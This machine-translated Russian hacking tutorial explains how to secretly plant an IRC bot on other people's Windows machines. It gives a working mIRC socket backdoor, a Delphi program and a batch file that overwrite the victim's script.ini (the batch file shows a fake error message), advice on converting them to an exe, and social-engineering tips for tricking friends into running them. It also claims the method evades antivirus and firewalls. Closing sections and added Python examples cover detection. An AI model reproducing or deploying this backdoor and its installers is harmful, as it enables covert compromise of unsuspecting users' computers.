This page was machine-translated from the Russian original, so expect the odd typo.

Planting a bot on Windows.



1. Intro.
2. Trojans.
3. mIRC scripts.
I. Writing the script backdoor.
II. Writing a Delphi program that inserts the backdoor into the victim's mIRC.
III. Writing a batch file that inserts the backdoor into the victim's mIRC.
IV. Social engineering: getting the victim to run it =)
4. The two methods compared.
5. How to protect yourself.
6. Outro.

1. These days it has become fashionable among the owners of popular channels to park a dozen bots, run from various Linux shells, on their channels to provide so-called "channel security". I have nothing against all those eggdrops, but what is an ordinary mortal user to do who has no shell, no scc and no knowledge (unlike the elite from #31337 on irc.dal.net.ru =)? In this article I'll show how to plant a bot on a machine running a Windows-like OS.
IMHO there are only two ways to do it: Trojans and Trojans =) Let's start with the first.

2. If you were on MSN's IRC (irc.msn.com) before it was shut down, you probably got to enjoy any number of bots on #russian_chat, #russian_girls, #russian_andybig and so on. Those bots were not eggdrops. They were, so to speak, SubSeven. Heard of that horse? Sub7 is the only Trojan I can remember that lets you plant an IRC bot remotely (I haven't used Trojans for a long time, so I don't know whether it has any analogues). So download Sub7 from here and enjoy. Those who are not used to taking the easy way can read on.

3. The capabilities of mIRC scripts are quite impressive. Writing a CGI scanner in them is a trifle, let alone a simple bot. Take the WarSatan script, for example: it has exactly such a "simple bot" built in. When you connect to your favourite IRC server, the script quietly connects the unsuspecting user to irc.webchat.org as well and joins them to #CHATOP, #MEKAH and #PANGKOR. That's the whole mechanism. Our task is to write the same simple backdoor as a mIRC plug-in.
I. I'll comment on the most important lines.

on 1:CONNECT:{
  ;# open a raw socket to your IRC server (substitute the host and port)
  .sockopen 31337 irc_server port
}
on 1:DISCONNECT:{
  ;# when the user disconnects, close the bot's socket too
  .sockclose 31337
}
on 1:SOCKOPEN:31337:{
  ;# register with the IRC server; the random suffix keeps several bots from colliding on one nick
  .sockwrite -n $sockname USER BOT "" "localhost" :Satanic bot
  .sockwrite -n $sockname NICK bot_nick $+ $r(1,999)
}
on 1:SOCKREAD:31337:{
  if ($sockerr) { return }
  :next
  .sockread %tmp
  if ($sockbr == 0) { return }
  ;# answer the server's PING, otherwise it drops the bot for ping timeout
  if ($gettok(%tmp,1,32) == PING) {
    .sockwrite -n $sockname PONG $gettok(%tmp,2-,32)
  }
  ;# numeric 001 means registration is complete; a JOIN sent before that is rejected with 451
  if ($gettok(%tmp,2,32) == 001) {
    .sockwrite -n $sockname JOIN your_channel
  }
  goto next
}


Remove the comments, substitute your values, number the lines (just paste it all into the mIRC script editor and save: the editor numbers every line itself, because script.ini stores the script as n0=, n1=, ... entries under a [script] header) and save the result as control.dll.
The backdoor itself is ready. Now it remains to slip it into someone else's script.ini.
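The exchange the script above carries out, as an added example in Python (not code from the article): a transport-free state machine that sends the same USER/NICK lines, answers every PING, and only joins once the server's 001 welcome arrives. The server transcript, irc.example.net, the nick Satan and #yourchannel are constructed; the retry on a 433 nick collision is an addition the mIRC script does not have.

```python
import random
from typing import List, Optional


class IrcBot:
    """Replays the backdoor's IRC exchange: register, answer PINGs, join once welcomed.

    Transport is left out: feed server lines to handle_line() and send whatever
    accumulates in .outbox over the socket (each line needs a trailing CRLF).
    """

    def __init__(self, nick_base: str, channel: str, suffix: Optional[int] = None) -> None:
        # The mIRC script appends $r(1,999) to the nick so several infected
        # clients do not collide on the same nick.
        self.nick = f"{nick_base}{suffix if suffix is not None else random.randint(1, 999)}"
        self.channel = channel
        self.registered = False
        self.outbox: List[str] = []

    def on_connect(self) -> None:
        # The same two registration lines the script sends in its SOCKOPEN handler.
        self.outbox.append('USER BOT "" "localhost" :Satanic bot')
        self.outbox.append(f"NICK {self.nick}")

    def handle_line(self, raw: str) -> None:
        line = raw.rstrip("\r\n")
        if not line:
            return
        # Strip the optional ":prefix " that names the origin of the message.
        if line.startswith(":"):
            _prefix, _, line = line.partition(" ")
        command, _, params = line.partition(" ")
        command = command.upper()

        if command == "PING":
            # Echo the token back; without this the server drops the bot on ping timeout.
            self.outbox.append(f"PONG {params}")
        elif command == "001" and not self.registered:
            # RPL_WELCOME: registration is complete, only now is a JOIN accepted.
            self.registered = True
            self.outbox.append(f"JOIN {self.channel}")
        elif command == "433" and not self.registered:
            # ERR_NICKNAMEINUSE: pick a new random suffix and retry (assumed
            # extension; the mIRC script itself does not handle this).
            self.nick = f"{self.nick.rstrip('0123456789')}{random.randint(1, 999)}"
            self.outbox.append(f"NICK {self.nick}")

    def drain(self) -> List[str]:
        """Return and clear the pending outgoing lines."""
        pending, self.outbox = self.outbox, []
        return pending


# Constructed server transcript (not captured from a real server).
SERVER_LINES = [
    "PING :1234567890",
    ":irc.example.net 001 Satan42 :Welcome to the Internet Relay Network Satan42",
    ":irc.example.net PING :irc.example.net",
]


def run_transcript(lines: List[str], suffix: int = 42) -> List[str]:
    """Drive the bot through a connect plus the given server lines; return all it sent."""
    bot = IrcBot("Satan", "#yourchannel", suffix=suffix)
    bot.on_connect()
    for line in lines:
        bot.handle_line(line)
    return bot.drain()


if __name__ == "__main__":
    for sent in run_transcript(SERVER_LINES):
        print(sent)
```

Running it prints the five lines the bot would put on the wire: USER, NICK, the PONG for the first PING, the JOIN triggered by 001, and the PONG for the second PING. The point worth noticing is the ordering: the JOIN is held back until registration is confirmed, which is why the SOCKREAD handler, not SOCKOPEN, is the right place for it.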

II. Here is the source of a Delphi program that searches the hard drive for script.ini and, if the search succeeds, replaces it with ours.

Important! control.dll must be in the same directory as this program.

program Project1;

uses
  SysUtils,
  Windows,
  ShellAPI;

const
  search = 'script.ini';   // the file to find and replace
  replace = 'control.dll'; // the file to replace it with; must sit in the
                           // directory this program is run from =)

var
  buf: array [0..255] of Char;
  fl: PChar;
  flag: Boolean = False;

// replace the found file with ours
procedure Change(where: PChar);

  function CopyFile(FromFile, ToDir: string): Boolean; // copy via the shell
  var
    F: TShFileOpStruct;
  begin
    F.Wnd := 0;
    F.wFunc := FO_COPY;
    // ShFileOperation expects double-NUL-terminated lists: one #0 added here,
    // the PChar cast supplies the other
    FromFile := FromFile + #0;
    F.pFrom := PChar(FromFile);
    ToDir := ToDir + #0;
    F.pTo := PChar(ToDir);
    F.fFlags := FOF_ALLOWUNDO or FOF_NOCONFIRMATION or FOF_SILENT;
    Result := ShFileOperation(F) = 0;
  end;

begin
  DeleteFile(where);
  CopyFile(replace, where);
end;

// recursive search of a whole drive
function Find(DirN: string): Boolean;
var
  tsr: TSearchRec;
  Full: string;
begin
  Result := False;
  if FindFirst(DirN + '\*.*', faAnyFile, tsr) = 0 then
  begin
    repeat
      if (tsr.Name = '.') or (tsr.Name = '..') then Continue;
      Full := DirN + '\' + tsr.Name;
      // test the directory bit rather than equality: directories usually
      // carry other attribute bits as well
      if (tsr.Attr and faDirectory) <> 0 then
        Find(Full);
    until (FindNext(tsr) <> 0) or (tsr.Name = search) or flag;

    if tsr.Name = search then // found it
    begin
      Result := True;
      flag := True;
      Change(PChar(DirN + '\' + tsr.Name));
    end;
    FindClose(tsr); // release the search handle
  end;
end;

// main block
begin
  // first try the standard search path; fall back to walking the drive
  if SearchPath(nil, search, nil, SizeOf(buf), buf, fl) > 0 then
    Change(buf)
  else
  begin
    Find('c:');
    // to search other drives as well, do it like this:
    // if not Find('c:') then
    //   if not Find('d:') then
    //     if not Find('e:') then
    // etc....
  end;
end.


III. If you are not a coder by birth and the word "compiler" gives you hives, let's write the same program as a batch file.

@echo off
cls
if exist mirc.ini goto in_the_same_dir
if exist c:\mirc\MIRC.INI set mirc=c:\mirc
if exist c:\mirc\mirc\MIRC.INI set mirc=c:\mirc\mirc
if exist c:\irc\MIRC.INI set mirc=c:\irc
if exist c:\irc\mirc\MIRC.INI set mirc=c:\irc\mirc
if exist c:\chat\mirc\MIRC.INI set mirc=c:\chat\mirc
if exist c:\chat\MIRC.INI set mirc=c:\chat
if exist c:\progra~1\mirc\MIRC.INI set mirc=c:\progra~1\mirc
if exist c:\chat\looksharp\MIRC.INI set look=c:\chat\looksharp
if exist c:\mirc\looksharp\MIRC.INI set look=c:\mirc\looksharp
if exist c:\irc\looksharp\MIRC.INI set look=c:\irc\looksharp
if exist c:\progra~1\looksharp\MIRC.INI set look=c:\progra~1\looksharp
if exist c:\progra~1\trion\MIRC.INI set neo=c:\progra~1\trion
if exist c:\progra~1\neo-ra\MIRC.INI set neo=c:\progra~1\neo-ra
if exist c:\progra~1\NeoRa\Trion\MIRC.INI set neo=c:\progra~1\NeoRa\Trion
if exist c:\progra~1\NeoRa\MIRC.INI set neo=c:\progra~1\NeoRa
if exist c:\chat\NeoRa\MIRC.INI set neo=c:\chat\NeoRa
if exist c:\irc\NeoRa\MIRC.INI set neo=c:\irc\NeoRa
if exist c:\chat\neo-ra\MIRC.INI set neo=c:\chat\neo-ra
if exist c:\irc\neo-ra\MIRC.INI set neo=c:\irc\neo-ra
if exist c:\chat\Trion\MIRC.INI set neo=c:\chat\Trion
if exist c:\irc\Trion\MIRC.INI set neo=c:\irc\Trion
if exist c:\Trion\MIRC.INI set neo=c:\Trion
if exist c:\NeoRa\MIRC.INI set neo=c:\NeoRa
if exist c:\Neo-ra\MIRC.INI set neo=c:\Neo-ra
if exist d:\chat\NeoRa\MIRC.INI set neo=d:\chat\NeoRa
if exist d:\irc\NeoRa\MIRC.INI set neo=d:\irc\NeoRa
if exist d:\chat\neo-ra\MIRC.INI set neo=d:\chat\neo-ra
if exist d:\irc\neo-ra\MIRC.INI set neo=d:\irc\neo-ra
if exist d:\chat\Trion\MIRC.INI set neo=d:\chat\Trion
if exist d:\irc\Trion\MIRC.INI set neo=d:\irc\Trion
if exist d:\Trion\MIRC.INI set neo=d:\Trion
if exist d:\NeoRa\MIRC.INI set neo=d:\NeoRa
if exist d:\Neo-ra\MIRC.INI set neo=d:\Neo-ra
if exist d:\mirc\MIRC.INI set mirc=d:\mirc
if exist d:\mirc\mirc\MIRC.INI set mirc=d:\mirc\mirc
if exist d:\irc\MIRC.INI set mirc=d:\irc
if exist d:\irc\mirc\MIRC.INI set mirc=d:\irc\mirc
if exist d:\chat\mirc\MIRC.INI set mirc=d:\chat\mirc
if exist d:\chat\MIRC.INI set mirc=d:\chat
if exist d:\looksharp\MIRC.INI set look=d:\looksharp
if exist d:\chat\looksharp\MIRC.INI set look=d:\chat\looksharp
if exist d:\mirc\looksharp\MIRC.INI set look=d:\mirc\looksharp
if exist d:\irc\looksharp\MIRC.INI set look=d:\irc\looksharp
if "%mirc%"=="" goto no_mirc
deltree /y %mirc%\script.ini
copy control.dll %mirc%\script.ini
cls
:no_mirc
if "%look%"=="" goto no_look
deltree /y %look%\System\lookevents04.sys
copy control.dll %look%\System\lookevents04.sys
cls
:no_look
if "%neo%"=="" goto end
deltree /y %neo%\root\trionscr7.ini
copy control.dll %neo%\root\trionscr7.ini
cls
goto end
:in_the_same_dir
deltree /y script.ini
copy control.dll script.ini
:end
echo Your Microsoft Windows is not correctly installed.
echo Please re-install it and try again

This contraption looks for mIRC, NeoRa Trion and LookSharp by guessing paths. The odds of a hit are fairly low, so it is better to talk the victim into putting this file, together with control.dll, in the same directory as their IRC client. On a successful search the client's script.ini (or the corresponding script file for LookSharp and Trion) is replaced with our control.dll.
Convert the batch file into an exe with some bat2exec and you can push it on your friends.

IV. I don't think I need to tell you how to push an exe on someone. I just want to point out one thing. Admit it, being asked to run an exe arouses suspicion even in a clueless user. So you can go the other way. Go back to step I, DO NOT number the script lines, just put them into a file joke.mrc. That's all. Now hand it to your friends with the words: put it in the directory with your mIRC, type /load -rs joke.mrc in the console and enjoy all the charms of the plug-in =)

4. So why is replacing script.ini the better way?
1) It isn't caught by antivirus software.
2) It isn't caught by firewalls. Many people will foam at the mouth proving that ZoneAlarm or AtGuard will protect them from this. For them specifically: if mIRC is registered in either firewall as an allowed server/client, the firewall won't so much as blink when the backdoor opens its connection, because the connection is made by the trusted mIRC process itself.
3) It is hard to detect and remove even for an experienced user.

5. And now, how to protect yourself. Again, I won't cover the Sub7 method (everything is clear there: AVP + ZoneAlarm) and will go straight to the second.
To detect a script backdoor, use some mIRC plug-in like IPSearch, which searches the server for a user with the same IP as yours. If there is one, somebody has definitely planted a bot on you. If not, either the bot is on another server or you're clean. It also pays to open the remote scripts editor (Alt+R) and look at every file loaded there, and at the [rfiles] section of mirc.ini, for a script you don't recognise or for sockopen/sockwrite commands in an on CONNECT handler.
You can also use ZoneAlarm itself to detect the bot: right now the largest IRC servers check all connecting clients for open proxies. How? With a simple port scan. So if you connect to irc.some.com and ZoneAlarm shows your ports being scanned by some irc.lame.com, it's worth thinking about...
How to remove the backdoor? If you don't understand the scripting, just reinstall the IRC client.
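Two of the checks above, an inspection of the script files themselves and the search for a second client on your own address (what IPSearch does), as an added example in Python that is not part of the original article. The script.ini layout ([script] header, nN= lines) and the field order of the 352 WHO reply are the real mIRC and IRC formats; the sample script bodies and WHO lines are constructed, and irc.example.net, the nick Satan42 and the addresses are made up. On servers that mask hostnames the WHO check shows nothing useful, which is the caveat the IPSearch approach carries.

```python
import re
from typing import List, Optional

# mIRC keeps script.ini as an INI file: a [script] header followed by one
# "nN=<script line>" entry per line; a .mrc file is the same text unnumbered.
NUMBERED_LINE = re.compile(r"^n\d+=(.*)$")
EVENT_HEADER = re.compile(r"^on\s+\S+?:(\w+):", re.IGNORECASE)
RAW_IRC_COMMANDS = {"USER", "NICK", "JOIN", "PONG", "PRIVMSG"}


def load_mirc_script(text: str) -> List[str]:
    """Return the bare script lines from either a script.ini body or a .mrc file."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith("[") and raw.endswith("]"):
            continue  # INI section header such as [script]
        m = NUMBERED_LINE.match(raw)
        lines.append(m.group(1) if m else raw)
    return lines


def audit_script(text: str) -> List[str]:
    """Flag the backdoor pattern: a socket opened from an event handler and raw
    IRC registration commands written to it. Returns one finding per hit."""
    findings = []
    event: Optional[str] = None
    for n, line in enumerate(load_mirc_script(text), 1):
        stripped = line.strip()
        header = EVENT_HEADER.match(stripped)
        if header:
            event = header.group(1).upper()
        elif stripped == "}":
            event = None
        parts = stripped.lstrip("./").split()  # drop mIRC's silent "." / "/" prefix
        if not parts:
            continue
        where = f" inside on {event}" if event else ""
        if parts[0].lower() == "sockopen":
            findings.append(f"line {n}: sockopen {' '.join(parts[1:4])}{where}")
        elif parts[0].lower() == "sockwrite":
            args = [p for p in parts[1:] if not p.startswith("-")]  # skip -n/-t flags
            if len(args) >= 2 and args[1].upper() in RAW_IRC_COMMANDS:
                findings.append(
                    f"line {n}: sockwrite of raw IRC command {args[1].upper()} to {args[0]}{where}"
                )
    return findings


def clients_sharing_host(who_replies: List[str], my_nick: str, my_host: str) -> List[str]:
    """From RPL_WHOREPLY (352) lines, list the other nicks connected from my_host.
    A second client on your own address that you did not start is a planted bot."""
    hits = []
    for raw in who_replies:
        parts = raw.split()
        # :server 352 me channel user host server nick flags :hopcount realname
        if len(parts) >= 8 and parts[1] == "352" and parts[5] == my_host and parts[7] != my_nick:
            hits.append(parts[7])
    return hits


# Constructed samples (not files or traffic captured from a real client).
BACKDOOR_INI = """[script]
n0=on 1:CONNECT:{
n1=.sockopen 31337 irc.example.net 6667
n2=}
n3=on 1:SOCKOPEN:31337:{
n4=.sockwrite -n $sockname USER BOT "" "localhost" :Satanic bot
n5=.sockwrite -n $sockname NICK Satan $+ $r(1,999)
n6=}
"""

BENIGN_MRC = """on 1:TEXT:!hello*:#:{
  msg $chan Hello $nick
}
"""

WHO_REPLIES = [
    ":irc.example.net 352 me #chan ~me 203.0.113.7 irc.example.net me H :0 Me",
    ":irc.example.net 352 me #chan ~BOT 203.0.113.7 irc.example.net Satan42 H :0 Satanic bot",
    ":irc.example.net 352 me #chan ~bob 198.51.100.9 irc.example.net bob H :0 Bob",
    ":irc.example.net 315 me #chan :End of /WHO list.",
]

if __name__ == "__main__":
    for finding in audit_script(BACKDOOR_INI):
        print(finding)
    print("benign findings:", audit_script(BENIGN_MRC))
    print("other clients on my host:", clients_sharing_host(WHO_REPLIES, "me", "203.0.113.7"))
```

Run against a real client, point load_mirc_script at every file listed under [rfiles] in mirc.ini, not just script.ini, since a backdoor loaded with /load lives in its own .mrc file; the WHO check needs the 352 lines from a /who against your own host mask.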

6. Well, what can I say in conclusion? Don't use unfamiliar scripts and don't push them on others =)